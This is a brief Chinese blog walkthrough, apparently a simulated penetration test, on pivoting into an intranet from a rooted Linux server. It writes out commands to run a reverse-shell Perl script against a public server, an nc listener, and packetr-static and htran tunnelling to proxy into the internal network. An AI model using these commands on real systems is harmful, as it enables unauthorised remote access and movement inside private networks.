Linux下的内网反弹实例

环境:

被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105

hack的操作用机-----我的电脑 192.168.1.101

反弹到公网的服务器-----我自己的公网服务器 61.160.2xx.xxx

渗透测试用的windows测试机   192.168.1.109

工具:

packetr-static   Linux下的

htran.exe windows下的

sockcap 用作代理进入内网渗透的利器

过程:

1.我模拟下极度苛刻的情况下的环境,该攻陷的Linux服务器对外不开放22,只存在web端口80,那么我们必须得反弹shell到公网的机器上,这点我虚拟机里面没 这个环境,我就直接说下简要的

上传back.pl文件到linux下的tmp目录下,执行

perl /tmp/back.pl xxx.xxx.xxx.xxx 端口

在公网的服务器上,运行nc执行

nc -l -v -p 端口(跟上面的一样)

现在我弹2个窗口回来,一个开代理,一个转发数据

把packetr-static传上去,执行

./packetr-static -s 1988


一个窗口转发数据,执行

./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988


2.在windows公网端执行,

htran.exe -p -listen 123 1988


3.配置sockcap


4.运行代理程序进入内网

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值